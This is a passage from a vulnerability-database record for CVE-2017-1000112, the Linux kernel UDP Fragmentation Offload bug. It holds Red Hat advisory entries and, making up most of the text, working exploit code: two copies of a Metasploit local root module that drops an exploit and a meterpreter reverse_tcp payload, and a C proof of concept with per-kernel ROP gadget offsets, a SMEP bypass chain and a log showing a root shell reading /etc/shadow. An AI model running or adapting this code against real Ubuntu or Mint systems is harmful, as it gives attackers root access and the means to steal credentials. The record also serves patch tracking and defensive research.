'CONFIG_USER_NS=y'\n vprint_error 'Kernel config does not include CONFIG_USER_NS'\n return CheckCode::Safe\n end\n vprint_good 'Kernel config has CONFIG_USER_NS enabled'\n\n unless userns_enabled?\n vprint_error 'Unprivileged user namespaces are not permitted'\n return CheckCode::Safe\n end\n vprint_good 'Unprivileged user namespaces are permitted'\n\n if lkrg_installed?\n vprint_error 'LKRG is installed'\n return CheckCode::Safe\n end\n vprint_good 'LKRG is not installed'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Upload exploit executable\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, strip_comments(exploit_data('exploit.c'))\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n upload_and_chmodx executable_path, exploit_data('exploit.out')\n end\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Launch exploit\n print_status 'Launching exploit ...'\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\"\n output.each_line { |line| vprint_status line.chomp }\n print_status \"Cleaning up #{payload_path} and #{executable_path} ...\"\n rm_f executable_path\n rm_f payload_path\n end\nend\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/ufo_privilege_escalation.rb"}], "redhat": [{"lastseen": "2019-08-13T18:44:56", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000112"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Exploitable memory corruption due to UFO to non-UFO path switch (CVE-2017-1000112)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* RHEL5.11 - Include backport of CVE Spectre V2 mitigation patch for s390x for kernel (BZ#1571905)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix this bug.", "modified": "2019-07-29T20:43:45", "published": "2019-07-29T20:36:12", "id": "RHSA-2019:1931", "href": "https://access.redhat.com/errata/RHSA-2019:1931", "type": "redhat", "title": "(RHSA-2019:1931) Important: kernel security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000112"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Exploitable memory corruption due to UFO to non-UFO path switch (CVE-2017-1000112)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-29T20:43:28", "published": "2019-07-29T20:37:05", "id": "RHSA-2019:1932", "href": "https://access.redhat.com/errata/RHSA-2019:1932", "type": "redhat", "title": "(RHSA-2019:1932) Important: kernel security update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-08-04T01:51:32", "description": "", "published": "2018-08-03T00:00:00", "type": "packetstorm", "title": "Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000112"], "modified": "2018-08-03T00:00:00", "id": "PACKETSTORM:148795", "href": "https://packetstormsecurity.com/files/148795/Linux-Kernel-UDP-Fragmentation-Offset-UFO-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges on Linux systems by abusing \nUDP Fragmentation Offload (UFO). \n \nThis exploit targets only systems using Ubuntu (Trusty / Xenial) kernels \n4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros \nbased on Ubuntu, such as Linux Mint. \n \nThe target system must have unprivileged user namespaces enabled \nand SMAP disabled. \n \nBypasses for SMEP and KASLR are included. Failed exploitation \nmay crash the kernel. \n \nThis module has been tested successfully on various Ubuntu and Linux \nMint systems, including: \n \nUbuntu 14.04.5 4.4.0-31-generic x64 Desktop; \nUbuntu 16.04 4.8.0-53-generic; \nLinux Mint 17.3 4.4.0-89-generic; \nLinux Mint 18 4.8.0-58-generic \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Andrey Konovalov', # Discovery and C exploit \n'h00die', # Metasploit module \n'Brendan Coles' # Metasploit module \n], \n'DisclosureDate' => 'Aug 10 2017', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'CVE', '2017-1000112' ], \n[ 'EDB', '43418' ], \n[ 'BID', '100262' ], \n[ 'URL', 'http://seclists.org/oss-sec/2017/q3/277' ], \n[ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c' ], \n[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa' ], \n[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112' ], \n[ 'URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/' ], \n[ 'URL', 'https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html' ], \n[ 'URL', 'https://github.com/bcoles/kernel-exploits/commits/cve-2017-1000112' ] \n], \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, \n'DefaultTarget' => 0)) \nregister_options [ \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data) \nupload \"#{path}.c\", data \n \ngcc_cmd = \"gcc -o #{path} #{path}.c\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \nrm_f \"#{path}.c\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \ncmd_exec \"chmod +x #{path}\" \nend \n \ndef exploit_data(file) \npath = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file \nfd = ::File.open path, 'rb' \ndata = fd.read fd.stat.size \nfd.close \ndata \nend \n \ndef live_compile? \nreturn false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') \n \nif has_gcc? \nvprint_good 'gcc is installed' \nreturn true \nend \n \nunless datastore['COMPILE'].eql? 'Auto' \nfail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' \nend \nend \n \ndef check \nversion = kernel_release \nunless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|45|47|51|53|57|59|62|63|64|66|67|70|71|72|75|78|79|81|83|87|89|81|89)-generic/ || \nversion =~ /^4\\.8\\.0-(34|36|39|41|45|46|49|51|52|53|54|56|58)-generic/ \nvprint_error \"Linux kernel version #{version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Linux kernel version #{version} is vulnerable\" \n \nvprint_status 'Checking if SMAP is enabled ...' \nif smap_enabled? \nvprint_error 'SMAP is enabled' \nreturn CheckCode::Safe \nend \nvprint_good 'SMAP is not enabled' \n \narch = kernel_hardware \nunless arch.include? 'x86_64' \nvprint_error \"System architecture #{arch} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"System architecture #{arch} is supported\" \n \nunless userns_enabled? \nvprint_error 'Unprivileged user namespaces are not permitted' \nreturn CheckCode::Safe \nend \nvprint_good 'Unprivileged user namespaces are permitted' \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nfail_with Failure::NotVulnerable, 'Target not vulnerable! punt!' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true' \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload exploit executable \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \nupload_and_compile executable_path, exploit_data('exploit.c') \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' \nupload_and_chmodx executable_path, exploit_data('exploit.out') \nend \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status 'Launching exploit ...' \noutput = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\" \noutput.each_line { |line| vprint_status line.chomp } \nprint_status \"Cleaning up #{payload_path} and #{executable_path} ...\" \nrm_f executable_path \nrm_f payload_path \nend \nend \n`\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148795/ufo_privilege_escalation.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 4.4.0 4.8.0 (Ubuntu 14.0416.04 Linux Mint 1718 Zorin) - Local Privilege Escalation (KASLR SMEP)", "edition": 1, "published": "2018-12-29T00:00:00", "title": "Linux Kernel 4.4.0 4.8.0 (Ubuntu 14.0416.04 Linux Mint 1718 Zorin) - Local Privilege Escalation (KASLR SMEP)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000112"], "modified": "2018-12-29T00:00:00", "id": "EXPLOITPACK:A5820DF756E60078D7D5399A134D0CEE", "href": "", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-1000112.\n// Includes KASLR and SMEP bypasses. No SMAP bypass.\n// Tested on:\n// - Ubuntu trusty 4.4.0 kernels\n// - Ubuntu xenial 4.4.0 and 4.8.0 kernels\n// - Linux Mint rosa 4.4.0 kernels\n// - Linux Mint sarah 4.8.0 kernels\n// - Zorin OS 12.1 4.4.0-39 kernel\n//\n// Usage:\n// user@ubuntu:~$ uname -a\n// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\n// user@ubuntu:~$ whoami\n// user\n// user@ubuntu:~$ id\n// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\n// user@ubuntu:~$ gcc pwn.c -o pwn\n// user@ubuntu:~$ ./pwn \n// [.] starting\n// [.] checking kernel version\n// [.] kernel version '4.8.0-58-generic' detected\n// [~] done, version looks good\n// [.] checking SMEP and SMAP\n// [~] done, looks good\n// [.] setting up namespace sandbox\n// [~] done, namespace sandbox set up\n// [.] KASLR bypass enabled, getting kernel addr\n// [~] done, kernel text: ffffffffae400000\n// [.] commit_creds: ffffffffae4a5d20\n// [.] prepare_kernel_cred: ffffffffae4a6110\n// [.] SMEP bypass enabled, mmapping fake stack\n// [~] done, fake stack mmapped\n// [.] executing payload ffffffffae40008d\n// [~] done, should be root now\n// [.] checking if we got root\n// [+] got r00t ^_^\n// root@ubuntu:/home/user# whoami\n// root\n// root@ubuntu:/home/user# id\n// uid=0(root) gid=0(root) groups=0(root)\n// root@ubuntu:/home/user# cat /etc/shadow\n// root:!:17246:0:99999:7:::\n// daemon:*:17212:0:99999:7:::\n// bin:*:17212:0:99999:7:::\n// sys:*:17212:0:99999:7:::\n// ...\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n// ---\n// Updated by <bcoles@gmail.com>\n// - support for distros based on Ubuntu kernel\n// - additional kernel targets\n// - additional KASLR bypasses\n// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-1000112\n\n#define _GNU_SOURCE\n\n#include <fcntl.h>\n#include <sched.h>\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#include <linux/socket.h>\n#include <netinet/ip.h>\n#include <sys/klog.h>\n#include <sys/mman.h>\n#include <sys/utsname.h>\n\n#define DEBUG\n\n#ifdef DEBUG\n#\tdefine dprintf printf\n#else\n#\tdefine dprintf\n#endif\n\n#define ENABLE_KASLR_BYPASS\t\t1\n#define ENABLE_SMEP_BYPASS\t\t1\n\nchar* SHELL = \"/bin/bash\";\n\n// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.\nunsigned long KERNEL_BASE =\t\t0xffffffff81000000ul;\n\n// Will be overwritten by detect_kernel().\nint kernel = -1;\n\nstruct kernel_info {\n\tconst char* distro;\n\tconst char* version;\n\tuint64_t commit_creds;\n\tuint64_t prepare_kernel_cred;\n\tuint64_t xchg_eax_esp_ret;\n\tuint64_t pop_rdi_ret;\n\tuint64_t mov_dword_ptr_rdi_eax_ret;\n\tuint64_t mov_rax_cr4_ret;\n\tuint64_t neg_rax_ret;\n\tuint64_t pop_rcx_ret;\n\tuint64_t or_rax_rcx_ret;\n\tuint64_t xchg_eax_edi_ret;\n\tuint64_t mov_cr4_rdi_ret;\n\tuint64_t jmp_rcx;\n};\n\nstruct kernel_info kernels[] = {\n\t{ \"trusty\", \"4.4.0-21-generic\", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },\n\t{ \"trusty\", \"4.4.0-22-generic\", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },\n\t{ \"trusty\", \"4.4.0-24-generic\", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\n\t{ \"trusty\", \"4.4.0-28-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\n\t{ \"trusty\", \"4.4.0-31-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\n\t{ \"trusty\", \"4.4.0-34-generic\", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },\n\t{ \"trusty\", \"4.4.0-36-generic\", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },\n\t{ \"trusty\", \"4.4.0-38-generic\", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-42-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-45-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-47-generic\", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-51-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-53-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-57-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-59-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-62-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-63-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-64-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-66-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-67-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-70-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-71-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-72-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-75-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-78-generic\", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-79-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },\n\t{ \"trusty\", \"4.4.0-81-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },\n\t{ \"trusty\", \"4.4.0-83-generic\", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },\n\t{ \"trusty\", \"4.4.0-87-generic\", 0x9ec20, 0x9ef00, 0x8a, 0x253b93, 0x109a17, 0x1a840, 0x3e7cda, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },\n\t{ \"trusty\", \"4.4.0-89-generic\", 0x9ec30, 0x9ef10, 0x8a, 0x3ec5cF, 0x109a27, 0x1a830, 0x3e7fba, 0x1cc7c, 0x77523, 0x49d1d, 0x62360, 0x1a77b },\n\t{ \"xenial\", \"4.4.0-81-generic\", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 },\n\t{ \"xenial\", \"4.4.0-89-generic\", 0xa28a0, 0xa2c90, 0x8a, 0x33e60d, 0x112777, 0x1b9b0, 0x403a1a, 0x1de5c, 0x7a483, 0x1084e5, 0x645b0, 0x3083d },\n\t{ \"xenial\", \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\n\t{ \"xenial\", \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\n\t{ \"xenial\", \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\n\t// { \"xenial\", \"4.8.0-42-generic\", 0xa5cf0, 0xa60e0, 0x8d, 0x4149ad, 0x1191f7, 0x1b170, 0x439d7a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df1b },\n\t// { \"xenial\", \"4.8.0-44-generic\", 0xa5cf0, 0xa60e0, 0x8d, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df17 },\n\t{ \"xenial\", \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-46-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-49-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-51-generic\", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-52-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-53-generic\", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x01b170, 0x43a0da, 0x63e843, 0x07bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-54-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-56-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-58-generic\", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },\n};\n\n// Used to get root privileges.\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\n\n// Used when ENABLE_SMEP_BYPASS is used.\n// - xchg eax, esp ; ret\n// - pop rdi ; ret\n// - mov dword ptr [rdi], eax ; ret\n// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret\n// - neg rax ; ret\n// - pop rcx ; ret \n// - or rax, rcx ; ret\n// - xchg eax, edi ; ret\n// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret\n// - jmp rcx\n#define XCHG_EAX_ESP_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)\n#define POP_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rdi_ret)\n#define MOV_DWORD_PTR_RDI_EAX_RET\t(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)\n#define MOV_RAX_CR4_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)\n#define NEG_RAX_RET\t\t\t(KERNEL_BASE + kernels[kernel].neg_rax_ret)\n#define POP_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rcx_ret)\n#define OR_RAX_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)\n#define XCHG_EAX_EDI_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)\n#define MOV_CR4_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)\n#define JMP_RCX\t\t\t\t(KERNEL_BASE + kernels[kernel].jmp_rcx)\n\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\n\ntypedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);\n\nvoid get_root(void) {\n\t((_commit_creds)(COMMIT_CREDS))(\n\t ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));\n}\n\n// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *\n\nuint64_t saved_esp;\n\n// Unfortunately GCC does not support `__atribute__((naked))` on x86, which\n// can be used to omit a function's prologue, so I had to use this weird\n// wrapper hack as a workaround. Note: Clang does support it, which means it\n// has better support of GCC attributes than GCC itself. Funny.\nvoid wrapper() {\n\tasm volatile (\"\t\t\t\t\t\\n\\\n\tpayload:\t\t\t\t\t\\n\\\n\t\tmovq %%rbp, %%rax\t\t\t\\n\\\n\t\tmovq $0xffffffff00000000, %%rdx\t\t\\n\\\n\t\tandq %%rdx, %%rax\t\t\t\\n\\\n\t\tmovq %0, %%rdx\t\t\t\t\\n\\\n\t\taddq %%rdx, %%rax\t\t\t\\n\\\n\t\tmovq %%rax, %%rsp\t\t\t\\n\\\n\t\tcall get_root\t\t\t\t\\n\\\n\t\tret\t\t\t\t\t\\n\\\n\t\" : : \"m\"(saved_esp) : );\n}\n\nvoid payload();\n\n#define CHAIN_SAVE_ESP\t\t\t\t\\\n\t*stack++ = POP_RDI_RET;\t\t\t\\\n\t*stack++ = (uint64_t)&saved_esp;\t\\\n\t*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;\n\n#define SMEP_MASK 0x100000\n\n#define CHAIN_DISABLE_SMEP\t\t\t\\\n\t*stack++ = MOV_RAX_CR4_RET;\t\t\\\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\n\t*stack++ = POP_RCX_RET;\t\t\t\\\n\t*stack++ = SMEP_MASK;\t\t\t\\\n\t*stack++ = OR_RAX_RCX_RET;\t\t\\\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\n\t*stack++ = 